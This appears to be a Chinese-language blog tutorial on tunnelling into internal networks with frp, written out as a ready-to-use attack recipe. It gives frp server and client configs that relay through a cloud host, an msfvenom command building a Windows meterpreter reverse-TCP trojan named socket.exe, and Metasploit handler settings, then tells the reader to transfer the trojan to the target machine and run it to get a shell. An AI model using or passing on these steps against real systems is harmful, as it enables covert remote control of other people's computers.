frp内网渗透隧道技术

​
1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)

服务器修改配置文件 frps.ini:
[common]
bind_port = 7000
启动服务端:
./frps -c ./frps.ini


2.控制端-下载-解压-修改-启动

控制端修改配置文件 frpc.ini:
[common]
server_addr = 你的云主机 ip
server_port = 7000 #frpc 工作端口,必须和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 2333 #转发给本机的 2333
remote_port = 2222 #服务端用 2222 端口转发给本机
启动客户端:
./frpc -c ./frpc.ini
msfvenom -p windows/meterpreter/reverse_tcp lhost=云主机ip lport=2222 -f exe -o socket.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 2333
exploit

3.靶机运行 socket.exe即可
————————————————
​

 配置服务端,如果是阿里云服务器,一定要把端口7000和2222端口开放,否则会失败。

 建立隧道连接后,说明7000端口没问题,接下来就是利用隧道来实现内网穿透了,隧道机监听ip:7000端口,并用2222端口转发到控制机的2333端口。

 msfvenom生成windows执行反弹shell的木马,执行后反弹到隧道机的2222端口,然后进行转发

frp内网渗透隧道技术_第1张图片

 msf监听本地2333端口

frp内网渗透隧道技术_第2张图片将socket.exe木马传输到目标机,执行后上线

 

你可能感兴趣的:(内网渗透,服务器,linux,网络)